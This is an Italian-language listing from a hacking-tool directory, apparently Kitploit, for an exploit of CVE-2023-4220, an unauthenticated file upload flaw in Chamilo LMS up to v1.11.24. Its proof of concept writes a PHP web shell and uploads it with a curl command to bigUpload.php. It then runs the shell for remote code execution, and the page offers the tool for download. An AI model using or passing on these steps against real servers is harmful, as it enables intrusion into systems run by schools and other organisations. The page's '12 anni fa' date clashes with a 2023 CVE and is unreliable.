Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220 — Caricamento di file senza restrizioni nella funzionalità di caricamento di file di grandi dimensioni in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 consente ad attaccanti non autenticati di effettuare attacchi di cross-site scripting persistente e di ottenere l'esecuzione remota di codice tramite il caricamento di una web shell. | Kitploit
Strumenti/GitHubGitHub/dollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubdollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220

Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Vedi RepositorySito web
12 anni faNon ancora revisionato

Caricamento di file senza restrizioni nella funzionalità di caricamento di file di grandi dimensioni in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 consente ad attaccanti non autenticati di effettuare attacchi di cross-site scripting persistente e di ottenere l'esecuzione remota di codice tramite il caricamento di una web shell.

Condividi

Chamilo-LMS-Unauthenticated-File-Upload-

Caricamento di file senza restrizioni nella funzionalità di caricamento di file di grandi dimensioni in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 consente ad attaccanti non autenticati di eseguire attacchi di cross-site scripting persistente e ottenere l'esecuzione remota di codice tramite il caricamento di una web shell.

Versione interessata ≤v1.11.24

Identificatore CVE CVE-2023-4220

Riepilogo della vulnerabilità

La funzionalità di caricamento di file di grandi dimensioni di /main/inc/lib/javascript/bigupload/inc/bigUpload.php consente di caricare file arbitrari nella directory /main/inc/lib/javascript/bigupload/files all'interno della root web.

Prova di concetto

  • Se la directory /main/inc/lib/javascript/bigupload/files esiste, possiamo caricare un file arbitrario come:

  • Creare un file php dannoso echo '<?php system("whoami"); ?>' > dollarboysushil.php Untitled (1).png

  • Possiamo quindi caricare questo file eseguendo il seguente comando

    root@kitploit:~
    `$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'` 
    

    Untitled (1).png

  • Possiamo verificare che il nostro file sia stato caricato visitando la directory /main/inc/lib/javascript/bigupload/files Untitled (1).png

  • E possiamo eseguirlo facendo clic sul file php, che restituisce l'output del comando whoami Untitled (1).png

Scarica lo strumento